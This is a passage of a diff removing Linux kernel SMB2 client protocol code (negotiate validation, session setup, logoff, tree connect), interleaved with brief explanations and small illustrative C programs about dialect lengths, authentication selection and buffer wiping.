+-			cpu_to_le16(SMB2_NEGOTIATE_SIGNING_ENABLED);
+-	else
+-		pneg_inbuf->SecurityMode = 0;
+-
+-
+-	if (strcmp(server->vals->version_string,
+-		SMB3ANY_VERSION_STRING) == 0) {
+-		pneg_inbuf->Dialects[0] = cpu_to_le16(SMB30_PROT_ID);
+-		pneg_inbuf->Dialects[1] = cpu_to_le16(SMB302_PROT_ID);
+-		pneg_inbuf->Dialects[2] = cpu_to_le16(SMB311_PROT_ID);
+-		pneg_inbuf->DialectCount = cpu_to_le16(3);
+-		/* SMB 2.1 not included so subtract one dialect from len */
+-		inbuflen = sizeof(*pneg_inbuf) -
+-				(sizeof(pneg_inbuf->Dialects[0]));
+-	} else if (strcmp(server->vals->version_string,
+-		SMBDEFAULT_VERSION_STRING) == 0) {
+-		pneg_inbuf->Dialects[0] = cpu_to_le16(SMB21_PROT_ID);
+-		pneg_inbuf->Dialects[1] = cpu_to_le16(SMB30_PROT_ID);
+-		pneg_inbuf->Dialects[2] = cpu_to_le16(SMB302_PROT_ID);
+-		pneg_inbuf->Dialects[3] = cpu_to_le16(SMB311_PROT_ID);
+-		pneg_inbuf->DialectCount = cpu_to_le16(4);
+-		/* structure is big enough for 4 dialects */
+-		inbuflen = sizeof(*pneg_inbuf);
+-	} else {
+-		/* otherwise specific dialect was requested */
+-		pneg_inbuf->Dialects[0] =
+-			cpu_to_le16(server->vals->protocol_id);
+-		pneg_inbuf->DialectCount = cpu_to_le16(1);
+-		/* structure is big enough for 4 dialects, sending only 1 */
+-		inbuflen = sizeof(*pneg_inbuf) -
+-				sizeof(pneg_inbuf->Dialects[0]) * 3;
+-	}
+-
+-	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+-		FSCTL_VALIDATE_NEGOTIATE_INFO,
+-		(char *)pneg_inbuf, inbuflen, CIFSMaxBufSize,
+-		(char **)&pneg_rsp, &rsplen);
+-	if (rc == -EOPNOTSUPP) {
+-		/*
+-		 * Old Windows versions or Netapp SMB server can return
+-		 * not supported error. Client should accept it.
+-		 */
+-		cifs_tcon_dbg(VFS, "Server does not support validate negotiate\n");
+-		rc = 0;
+-		goto out_free_inbuf;
+-	} else if (rc != 0) {
+-		cifs_tcon_dbg(VFS, "validate protocol negotiate failed: %d\n",
+-			      rc);
+-		rc = -EIO;
+-		goto out_free_inbuf;
+-	}
+-
+-	rc = -EIO;
+-	if (rsplen != sizeof(*pneg_rsp)) {
+-		cifs_tcon_dbg(VFS, "Invalid protocol negotiate response size: %d\n",
+-			      rsplen);
+-
+-		/* relax check since Mac returns max bufsize allowed on ioctl */
+-		if (rsplen > CIFSMaxBufSize || rsplen < sizeof(*pneg_rsp))
+-			goto out_free_rsp;
+-	}
+-
+-	/* check validate negotiate info response matches what we got earlier */
+-	if (pneg_rsp->Dialect != cpu_to_le16(server->dialect))
+-		goto vneg_out;
+-
+-	if (pneg_rsp->SecurityMode != cpu_to_le16(server->sec_mode))
+-		goto vneg_out;
+-
+-	/* do not validate server guid because not saved at negprot time yet */
+-
+-	if ((le32_to_cpu(pneg_rsp->Capabilities) | SMB2_NT_FIND |
+-	      SMB2_LARGE_FILES) != server->capabilities)
+-		goto vneg_out;
+-
+-	/* validate negotiate successful */
+-	rc = 0;
+-	cifs_dbg(FYI, "validate negotiate info successful\n");
+-	goto out_free_rsp;
+-
+-vneg_out:
+-	cifs_tcon_dbg(VFS, "protocol revalidation - security settings mismatch\n");
+-out_free_rsp:
+-	kfree(pneg_rsp);
+-out_free_inbuf:
+-	kfree(pneg_inbuf);
+-	return rc;
+-}
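
smb3_validate_negotiate() trims the on-the-wire length when fewer than the four statically allocated dialect slots are used. A simplified stand-in struct (not the real validate_negotiate_info_req layout) makes the subtraction visible:

#include <stdio.h>

struct vneg_req {                    /* simplified stand-in only */
	unsigned int capabilities;
	unsigned char guid[16];
	unsigned short security_mode;
	unsigned short dialect_count;
	unsigned short dialects[4];  /* structure is big enough for 4 */
};

int main(void)
{
	printf("4 dialects: %zu bytes\n", sizeof(struct vneg_req));
	printf("3 dialects: %zu bytes\n",
	       sizeof(struct vneg_req) - sizeof(unsigned short));
	printf("1 dialect:  %zu bytes\n",
	       sizeof(struct vneg_req) - 3 * sizeof(unsigned short));
	return 0;
}
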
+-
+-enum securityEnum
+-smb2_select_sectype(struct TCP_Server_Info *server, enum securityEnum requested)
+-{
+-	switch (requested) {
+-	case Kerberos:
+-	case RawNTLMSSP:
+-		return requested;
+-	case NTLMv2:
+-		return RawNTLMSSP;
+-	case Unspecified:
+-		if (server->sec_ntlmssp &&
+-			(global_secflags & CIFSSEC_MAY_NTLMSSP))
+-			return RawNTLMSSP;
+-		if ((server->sec_kerberos || server->sec_mskerberos) &&
+-			(global_secflags & CIFSSEC_MAY_KRB5))
+-			return Kerberos;
+-		fallthrough;
+-	default:
+-		return Unspecified;
+-	}
+-}
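
A compact userspace restatement of the selection above, with the global_secflags masking dropped for brevity (the helper itself is hypothetical; only the precedence rules are mirrored):

#include <stdio.h>

enum sectype { Unspecified, NTLMv2, RawNTLMSSP, Kerberos };

static enum sectype select_sectype(int srv_ntlmssp, int srv_krb5,
				   enum sectype requested)
{
	switch (requested) {
	case Kerberos:
	case RawNTLMSSP:
		return requested;  /* explicit request wins */
	case NTLMv2:
		return RawNTLMSSP; /* NTLMv2 is carried inside raw NTLMSSP */
	default:                   /* Unspecified: fall back to server offer */
		if (srv_ntlmssp)
			return RawNTLMSSP;
		if (srv_krb5)
			return Kerberos;
		return Unspecified;
	}
}

int main(void)
{
	printf("%d\n", select_sectype(1, 1, Unspecified)); /* RawNTLMSSP */
	printf("%d\n", select_sectype(0, 1, Unspecified)); /* Kerberos */
	return 0;
}
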
+-
+-struct SMB2_sess_data {
+-	unsigned int xid;
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct nls_table *nls_cp;
+-	void (*func)(struct SMB2_sess_data *);
+-	int result;
+-	u64 previous_session;
+-
+-	/* we will send the SMB in three pieces:
+-	 * a fixed length beginning part, an optional
+-	 * SPNEGO blob (which can be zero length), and a
+-	 * last part which will include the strings
+-	 * and rest of bcc area. This allows us to avoid
+-	 * a large buffer 17K allocation
+-	 */
+-	int buf0_type;
+-	struct kvec iov[2];
+-};
+-
+-static int
+-SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	struct smb2_sess_setup_req *req;
+-	unsigned int total_len;
+-	bool is_binding = false;
+-
+-	rc = smb2_plain_req_init(SMB2_SESSION_SETUP, NULL, server,
+-				 (void **) &req,
+-				 &total_len);
+-	if (rc)
+-		return rc;
+-
+-	spin_lock(&ses->ses_lock);
+-	is_binding = (ses->ses_status == SES_GOOD);
+-	spin_unlock(&ses->ses_lock);
+-
+-	if (is_binding) {
+-		req->hdr.SessionId = cpu_to_le64(ses->Suid);
+-		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
+-		req->PreviousSessionId = 0;
+-		req->Flags = SMB2_SESSION_REQ_FLAG_BINDING;
+-		cifs_dbg(FYI, "Binding to sess id: %llx\n", ses->Suid);
+-	} else {
+-		/* First session, not a reauthenticate */
+-		req->hdr.SessionId = 0;
+-		/*
+-		 * if reconnecting, we need to send the previous sess id;
+-		 * otherwise it is 0
+-		 */
+-		req->PreviousSessionId = cpu_to_le64(sess_data->previous_session);
+-		req->Flags = 0; /* MBZ */
+-		cifs_dbg(FYI, "Fresh session. Previous: %llx\n",
+-			 sess_data->previous_session);
+-	}
+-
+-	/* enough to enable echos and oplocks and one max size write */
+-	req->hdr.CreditRequest = cpu_to_le16(130);
+-
+-	/* only one of SMB2 signing flags may be set in SMB2 request */
+-	if (server->sign)
+-		req->SecurityMode = SMB2_NEGOTIATE_SIGNING_REQUIRED;
+-	else if (global_secflags & CIFSSEC_MAY_SIGN) /* one flag unlike MUST_ */
+-		req->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED;
+-	else
+-		req->SecurityMode = 0;
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	req->Capabilities = cpu_to_le32(SMB2_GLOBAL_CAP_DFS);
+-#else
+-	req->Capabilities = 0;
+-#endif /* DFS_UPCALL */
+-
+-	req->Channel = 0; /* MBZ */
+-
+-	sess_data->iov[0].iov_base = (char *)req;
+-	/* 1 for pad */
+-	sess_data->iov[0].iov_len = total_len - 1;
+-	/*
+-	 * This variable will be used to clear the buffer
+-	 * allocated above in case of any error in the calling function.
+-	 */
+-	sess_data->buf0_type = CIFS_SMALL_BUFFER;
+-
+-	return 0;
+-}
+-
+-static void
+-SMB2_sess_free_buffer(struct SMB2_sess_data *sess_data)
+-{
+-	struct kvec *iov = sess_data->iov;
+-
+-	/* iov[1] is already freed by caller */
+-	if (sess_data->buf0_type != CIFS_NO_BUFFER && iov[0].iov_base)
+-		memzero_explicit(iov[0].iov_base, iov[0].iov_len);
+-
+-	free_rsp_buf(sess_data->buf0_type, iov[0].iov_base);
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-}
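
SMB2_sess_free_buffer() wipes the request buffer with memzero_explicit() before releasing it, so session-setup material does not linger in freed memory. A userspace analogue of the pattern; the compiler barrier is one common way to keep the memset() from being optimized away (an illustration, not the kernel implementation):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static void zero_explicit(void *p, size_t n)
{
	memset(p, 0, n);
	__asm__ __volatile__("" : : "r" (p) : "memory"); /* barrier */
}

int main(void)
{
	char *buf = malloc(64);

	if (!buf)
		return 1;
	snprintf(buf, 64, "session setup material");
	zero_explicit(buf, 64); /* wipe before free, as above */
	free(buf);
	return 0;
}
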
+-
+-static int
+-SMB2_sess_sendreceive(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct smb_rqst rqst;
+-	struct smb2_sess_setup_req *req = sess_data->iov[0].iov_base;
+-	struct kvec rsp_iov = { NULL, 0 };
+-
+-	/* Testing shows that buffer offset must be at location of Buffer[0] */
+-	req->SecurityBufferOffset =
+-		cpu_to_le16(sizeof(struct smb2_sess_setup_req) - 1 /* pad */);
+-	req->SecurityBufferLength = cpu_to_le16(sess_data->iov[1].iov_len);
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = sess_data->iov;
+-	rqst.rq_nvec = 2;
+-
+-	/* BB add code to build os and lm fields */
+-	rc = cifs_send_recv(sess_data->xid, sess_data->ses,
+-			    sess_data->server,
+-			    &rqst,
+-			    &sess_data->buf0_type,
+-			    CIFS_LOG_ERROR | CIFS_SESS_OP, &rsp_iov);
+-	cifs_small_buf_release(sess_data->iov[0].iov_base);
+-	memcpy(&sess_data->iov[0], &rsp_iov, sizeof(struct kvec));
+-
+-	return rc;
+-}
+-
+-static int
+-SMB2_sess_establish_session(struct SMB2_sess_data *sess_data)
+-{
+-	int rc = 0;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-
+-	cifs_server_lock(server);
+-	if (server->ops->generate_signingkey) {
+-		rc = server->ops->generate_signingkey(ses, server);
+-		if (rc) {
+-			cifs_dbg(FYI,
+-				"SMB3 session key generation failed\n");
+-			cifs_server_unlock(server);
+-			return rc;
+-		}
+-	}
+-	if (!server->session_estab) {
+-		server->sequence_number = 0x2;
+-		server->session_estab = true;
+-	}
+-	cifs_server_unlock(server);
+-
+-	cifs_dbg(FYI, "SMB2/3 session established successfully\n");
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_UPCALL
+-static void
+-SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	struct cifs_spnego_msg *msg;
+-	struct key *spnego_key = NULL;
+-	struct smb2_sess_setup_rsp *rsp = NULL;
+-	bool is_binding = false;
+-
+-	rc = SMB2_sess_alloc_buffer(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	spnego_key = cifs_get_spnego_key(ses, server);
+-	if (IS_ERR(spnego_key)) {
+-		rc = PTR_ERR(spnego_key);
+-		if (rc == -ENOKEY)
+-			cifs_dbg(VFS, "Verify user has a krb5 ticket and keyutils is installed\n");
+-		spnego_key = NULL;
+-		goto out;
+-	}
+-
+-	msg = spnego_key->payload.data[0];
+-	/*
+-	 * check version field to make sure that cifs.upcall is
+-	 * sending us a response in an expected form
+-	 */
+-	if (msg->version != CIFS_SPNEGO_UPCALL_VERSION) {
+-		cifs_dbg(VFS, "bad cifs.upcall version. Expected %d got %d\n",
+-			 CIFS_SPNEGO_UPCALL_VERSION, msg->version);
+-		rc = -EKEYREJECTED;
+-		goto out_put_spnego_key;
+-	}
+-
+-	spin_lock(&ses->ses_lock);
+-	is_binding = (ses->ses_status == SES_GOOD);
+-	spin_unlock(&ses->ses_lock);
+-
+-	/* keep session key if binding */
+-	if (!is_binding) {
+-		kfree_sensitive(ses->auth_key.response);
+-		ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
+-						 GFP_KERNEL);
+-		if (!ses->auth_key.response) {
+-			cifs_dbg(VFS, "Kerberos can't allocate (%u bytes) memory\n",
+-				 msg->sesskey_len);
+-			rc = -ENOMEM;
+-			goto out_put_spnego_key;
+-		}
+-		ses->auth_key.len = msg->sesskey_len;
+-	}
+-
+-	sess_data->iov[1].iov_base = msg->data + msg->sesskey_len;
+-	sess_data->iov[1].iov_len = msg->secblob_len;
+-
+-	rc = SMB2_sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out_put_spnego_key;
+-
+-	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+-	/* keep session id and flags if binding */
+-	if (!is_binding) {
+-		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
+-		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
+-	}
+-
+-	rc = SMB2_sess_establish_session(sess_data);
+-out_put_spnego_key:
+-	key_invalidate(spnego_key);
+-	key_put(spnego_key);
+-	if (rc) {
+-		kfree_sensitive(ses->auth_key.response);
+-		ses->auth_key.response = NULL;
+-		ses->auth_key.len = 0;
+-	}
+-out:
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-	SMB2_sess_free_buffer(sess_data);
+-}
+-#else
+-static void
+-SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+-{
+-	cifs_dbg(VFS, "Kerberos negotiated but upcall support disabled!\n");
+-	sess_data->result = -EOPNOTSUPP;
+-	sess_data->func = NULL;
+-}
+-#endif
+-
+-static void
+-SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data);
+-
+-static void
+-SMB2_sess_auth_rawntlmssp_negotiate(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	struct smb2_sess_setup_rsp *rsp = NULL;
+-	unsigned char *ntlmssp_blob = NULL;
+-	bool use_spnego = false; /* else use raw ntlmssp */
+-	u16 blob_length = 0;
+-	bool is_binding = false;
+-
+-	/*
+-	 * If memory allocation is successful, caller of this function
+-	 * frees it.
+-	 */
+-	ses->ntlmssp = kmalloc(sizeof(struct ntlmssp_auth), GFP_KERNEL);
+-	if (!ses->ntlmssp) {
+-		rc = -ENOMEM;
+-		goto out_err;
+-	}
+-	ses->ntlmssp->sesskey_per_smbsess = true;
+-
+-	rc = SMB2_sess_alloc_buffer(sess_data);
+-	if (rc)
+-		goto out_err;
+-
+-	rc = build_ntlmssp_smb3_negotiate_blob(&ntlmssp_blob,
+-					  &blob_length, ses, server,
+-					  sess_data->nls_cp);
+-	if (rc)
+-		goto out;
+-
+-	if (use_spnego) {
+-		/* BB eventually need to add this */
+-		cifs_dbg(VFS, "spnego not supported for SMB2 yet\n");
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-	sess_data->iov[1].iov_base = ntlmssp_blob;
+-	sess_data->iov[1].iov_len = blob_length;
+-
+-	rc = SMB2_sess_sendreceive(sess_data);
+-	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+-
+-	/* If true, rc here is expected and not an error */
+-	if (sess_data->buf0_type != CIFS_NO_BUFFER &&
+-		rsp->hdr.Status == STATUS_MORE_PROCESSING_REQUIRED)
+-		rc = 0;
+-
+-	if (rc)
+-		goto out;
+-
+-	if (offsetof(struct smb2_sess_setup_rsp, Buffer) !=
+-			le16_to_cpu(rsp->SecurityBufferOffset)) {
+-		cifs_dbg(VFS, "Invalid security buffer offset %d\n",
+-			le16_to_cpu(rsp->SecurityBufferOffset));
+-		rc = -EIO;
+-		goto out;
+-	}
+-	rc = decode_ntlmssp_challenge(rsp->Buffer,
+-			le16_to_cpu(rsp->SecurityBufferLength), ses);
+-	if (rc)
+-		goto out;
+-
+-	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
+-
+-	spin_lock(&ses->ses_lock);
+-	is_binding = (ses->ses_status == SES_GOOD);
+-	spin_unlock(&ses->ses_lock);
+-
+-	/* keep existing ses id and flags if binding */
+-	if (!is_binding) {
+-		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
+-		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
+-	}
+-
+-out:
+-	kfree_sensitive(ntlmssp_blob);
+-	SMB2_sess_free_buffer(sess_data);
+-	if (!rc) {
+-		sess_data->result = 0;
+-		sess_data->func = SMB2_sess_auth_rawntlmssp_authenticate;
+-		return;
+-	}
+-out_err:
+-	kfree_sensitive(ses->ntlmssp);
+-	ses->ntlmssp = NULL;
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-}
+-
+-static void
+-SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	struct smb2_sess_setup_req *req;
+-	struct smb2_sess_setup_rsp *rsp = NULL;
+-	unsigned char *ntlmssp_blob = NULL;
+-	bool use_spnego = false; /* else use raw ntlmssp */
+-	u16 blob_length = 0;
+-	bool is_binding = false;
+-
+-	rc = SMB2_sess_alloc_buffer(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	req = (struct smb2_sess_setup_req *) sess_data->iov[0].iov_base;
+-	req->hdr.SessionId = cpu_to_le64(ses->Suid);
+-
+-	rc = build_ntlmssp_auth_blob(&ntlmssp_blob, &blob_length,
+-				     ses, server,
+-				     sess_data->nls_cp);
+-	if (rc) {
+-		cifs_dbg(FYI, "build_ntlmssp_auth_blob failed %d\n", rc);
+-		goto out;
+-	}
+-
+-	if (use_spnego) {
+-		/* BB eventually need to add this */
+-		cifs_dbg(VFS, "spnego not supported for SMB2 yet\n");
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-	sess_data->iov[1].iov_base = ntlmssp_blob;
+-	sess_data->iov[1].iov_len = blob_length;
+-
+-	rc = SMB2_sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+-
+-	spin_lock(&ses->ses_lock);
+-	is_binding = (ses->ses_status == SES_GOOD);
+-	spin_unlock(&ses->ses_lock);
+-
+-	/* keep existing ses id and flags if binding */
+-	if (!is_binding) {
+-		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
+-		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
+-	}
+-
+-	rc = SMB2_sess_establish_session(sess_data);
+-#ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
+-	if (ses->server->dialect < SMB30_PROT_ID) {
+-		cifs_dbg(VFS, "%s: dumping generated SMB2 session keys\n", __func__);
+-		/*
+-		 * The session id is opaque in terms of endianness, so we can't
+-		 * print it as a long long. We dump it as we got it on the wire.
+-		 */
+-		cifs_dbg(VFS, "Session Id    %*ph\n", (int)sizeof(ses->Suid),
+-			 &ses->Suid);
+-		cifs_dbg(VFS, "Session Key   %*ph\n",
+-			 SMB2_NTLMV2_SESSKEY_SIZE, ses->auth_key.response);
+-		cifs_dbg(VFS, "Signing Key   %*ph\n",
+-			 SMB3_SIGN_KEY_SIZE, ses->auth_key.response);
+-	}
+-#endif
+-out:
+-	kfree_sensitive(ntlmssp_blob);
+-	SMB2_sess_free_buffer(sess_data);
+-	kfree_sensitive(ses->ntlmssp);
+-	ses->ntlmssp = NULL;
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-}
+-
+-static int
+-SMB2_select_sec(struct SMB2_sess_data *sess_data)
+-{
+-	int type;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-
+-	type = smb2_select_sectype(server, ses->sectype);
+-	cifs_dbg(FYI, "sess setup type %d\n", type);
+-	if (type == Unspecified) {
+-		cifs_dbg(VFS, "Unable to select appropriate authentication method!\n");
+-		return -EINVAL;
+-	}
+-
+-	switch (type) {
+-	case Kerberos:
+-		sess_data->func = SMB2_auth_kerberos;
+-		break;
+-	case RawNTLMSSP:
+-		sess_data->func = SMB2_sess_auth_rawntlmssp_negotiate;
+-		break;
+-	default:
+-		cifs_dbg(VFS, "secType %d not supported!\n", type);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_sess_setup(const unsigned int xid, struct cifs_ses *ses,
+-		struct TCP_Server_Info *server,
+-		const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	struct SMB2_sess_data *sess_data;
+-
+-	cifs_dbg(FYI, "Session Setup\n");
+-
+-	if (!server) {
+-		WARN(1, "%s: server is NULL!\n", __func__);
+-		return -EIO;
+-	}
+-
+-	sess_data = kzalloc(sizeof(struct SMB2_sess_data), GFP_KERNEL);
+-	if (!sess_data)
+-		return -ENOMEM;
+-
+-	sess_data->xid = xid;
+-	sess_data->ses = ses;
+-	sess_data->server = server;
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-	sess_data->nls_cp = (struct nls_table *) nls_cp;
+-	sess_data->previous_session = ses->Suid;
+-
+-	rc = SMB2_select_sec(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	/*
+-	 * Initialize the session hash with the server one.
+-	 */
+-	memcpy(ses->preauth_sha_hash, server->preauth_sha_hash,
+-	       SMB2_PREAUTH_HASH_SIZE);
+-
+-	while (sess_data->func)
+-		sess_data->func(sess_data);
+-
+-	if ((ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST) && (ses->sign))
+-		cifs_server_dbg(VFS, "signing requested but authenticated as guest\n");
+-	rc = sess_data->result;
+-out:
+-	kfree_sensitive(sess_data);
+-	return rc;
+-}
+-
+-int
+-SMB2_logoff(const unsigned int xid, struct cifs_ses *ses)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_logoff_req *req; /* response is also trivial struct */
+-	int rc = 0;
+-	struct TCP_Server_Info *server;
+-	int flags = 0;
+-	unsigned int total_len;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-
+-	cifs_dbg(FYI, "disconnect session %p\n", ses);
+-
+-	if (ses && (ses->server))
+-		server = ses->server;
+-	else
+-		return -EIO;
+-
+-	/* no need to send SMB logoff if uid already closed due to reconnect */
+-	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
+-		spin_unlock(&ses->chan_lock);
+-		goto smb2_session_already_dead;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	rc = smb2_plain_req_init(SMB2_LOGOFF, NULL, ses->server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	 /* since there is no tcon, smb2_init cannot do this, so do it here */
+-	req->hdr.SessionId = cpu_to_le64(ses->Suid);
+-
+-	if (ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA)
+-		flags |= CIFS_TRANSFORM_REQ;
+-	else if (server->sign)
+-		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
+-
+-	flags |= CIFS_NO_RSP_BUF;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, ses->server,
+-			    &rqst, &resp_buf_type, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-	/*
+-	 * No tcon so can't do
+-	 * cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_fail[SMB2...]);
+-	 */
+-
+-smb2_session_already_dead:
+-	return rc;
+-}
+-
+-static inline void cifs_stats_fail_inc(struct cifs_tcon *tcon, uint16_t code)
+-{
+-	cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_failed[code]);
+-}
+-
+-#define MAX_SHARENAME_LENGTH (255 /* server */ + 80 /* share */ + 1 /* NULL */)
+-
+-/* These are similar values to what Windows uses */
+-static inline void init_copy_chunk_defaults(struct cifs_tcon *tcon)
+-{
+-	tcon->max_chunks = 256;
+-	tcon->max_bytes_chunk = 1048576;
+-	tcon->max_bytes_copy = 16777216;
+-}
+-
+-int
+-SMB2_tcon(const unsigned int xid, struct cifs_ses *ses, const char *tree,
+-	  struct cifs_tcon *tcon, const struct nls_table *cp)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_tree_connect_req *req;
+-	struct smb2_tree_connect_rsp *rsp = NULL;
+-	struct kvec iov[2];
+-	struct kvec rsp_iov = { NULL, 0 };
+-	int rc = 0;
+-	int resp_buftype;
+-	int unc_path_len;
+-	__le16 *unc_path = NULL;
+-	int flags = 0;
+-	unsigned int total_len;
+-	struct TCP_Server_Info *server;
+-
+-	/* always use master channel */
+-	server = ses->server;
+-
+-	cifs_dbg(FYI, "TCON\n");
+-
+-	if (!server || !tree)
+-		return -EIO;
+-
+-	unc_path = kmalloc(MAX_SHARENAME_LENGTH * 2, GFP_KERNEL);
+-	if (unc_path == NULL)
+-		return -ENOMEM;
+-
+-	unc_path_len = cifs_strtoUTF16(unc_path, tree, strlen(tree), cp) + 1;
+-	unc_path_len *= 2;
+-	if (unc_path_len < 2) {
+-		kfree(unc_path);
+-		return -EINVAL;
+-	}
+-
+-	/* SMB2 TREE_CONNECT request must be called with TreeId == 0 */
+-	tcon->tid = 0;
+-	atomic_set(&tcon->num_remote_opens, 0);
+-	rc = smb2_plain_req_init(SMB2_TREE_CONNECT, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc) {
+-		kfree(unc_path);
+-		return rc;
+-	}
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for pad */
+-	iov[0].iov_len = total_len - 1;
+-
+-	/* Testing shows that buffer offset must be at location of Buffer[0] */
+-	req->PathOffset = cpu_to_le16(sizeof(struct smb2_tree_connect_req)
+-			- 1 /* pad */);
+-	req->PathLength = cpu_to_le16(unc_path_len - 2);
+-	iov[1].iov_base = unc_path;
+-	iov[1].iov_len = unc_path_len;
+-
+-	/*
+-	 * A 3.11 tcon request must be signed if not encrypted (see MS-SMB2
+-	 * 3.2.4.1.1), unless it is a guest or anonymous user (MS-SMB2 3.2.5.3.1).
+-	 * (Samba servers don't always set the flag, so also check for a null user.)
+-	 */
+-	if ((server->dialect == SMB311_PROT_ID) &&
+-	    !smb3_encryption_required(tcon) &&
+-	    !(ses->session_flags &
+-		    (SMB2_SESSION_FLAG_IS_GUEST|SMB2_SESSION_FLAG_IS_NULL)) &&
+-	    ((ses->user_name != NULL) || (ses->sectype == Kerberos)))
+-		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 2;
+-
+-	/* Need 64 credits for a max size write, so ask for more in case not there yet */
+-	req->hdr.CreditRequest = cpu_to_le16(64);
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-	rsp = (struct smb2_tree_connect_rsp *)rsp_iov.iov_base;
+-	trace_smb3_tcon(xid, tcon->tid, ses->Suid, tree, rc);
+-	if ((rc != 0) || (rsp == NULL)) {
+-		cifs_stats_fail_inc(tcon, SMB2_TREE_CONNECT_HE);
+-		tcon->need_reconnect = true;
+-		goto tcon_error_exit;
+-	}
+-
+-	switch (rsp->ShareType) {
+-	case SMB2_SHARE_TYPE_DISK:
+-		cifs_dbg(FYI, "connection to disk share\n");
+-		break;
+-	case SMB2_SHARE_TYPE_PIPE:
+-		tcon->pipe = true;
+-		cifs_dbg(FYI, "connection to pipe share\n");
+-		break;
+-	case SMB2_SHARE_TYPE_PRINT:
+-		tcon->print = true;
+-		cifs_dbg(FYI, "connection to printer\n");
+-		break;
+-	default:
+-		cifs_server_dbg(VFS, "unknown share type %d\n", rsp->ShareType);
+-		rc = -EOPNOTSUPP;
+-		goto tcon_error_exit;
+-	}
+-
+-	tcon->share_flags = le32_to_cpu(rsp->ShareFlags);
+-	tcon->capabilities = rsp->Capabilities; /* we keep caps little endian */
+-	tcon->maximal_access = le32_to_cpu(rsp->MaximalAccess);
+-	tcon->tid = le32_to_cpu(rsp->hdr.Id.SyncId.TreeId);
+-	strscpy(tcon->tree_name, tree, sizeof(tcon->tree_name));
+-
+-	if ((rsp->Capabilities & SMB2_SHARE_CAP_DFS) &&
+-	    ((tcon->share_flags & SHI1005_FLAGS_DFS) == 0))
+-		cifs_tcon_dbg(VFS, "DFS capability contradicts DFS flag\n");
+-
+-	if (tcon->seal &&
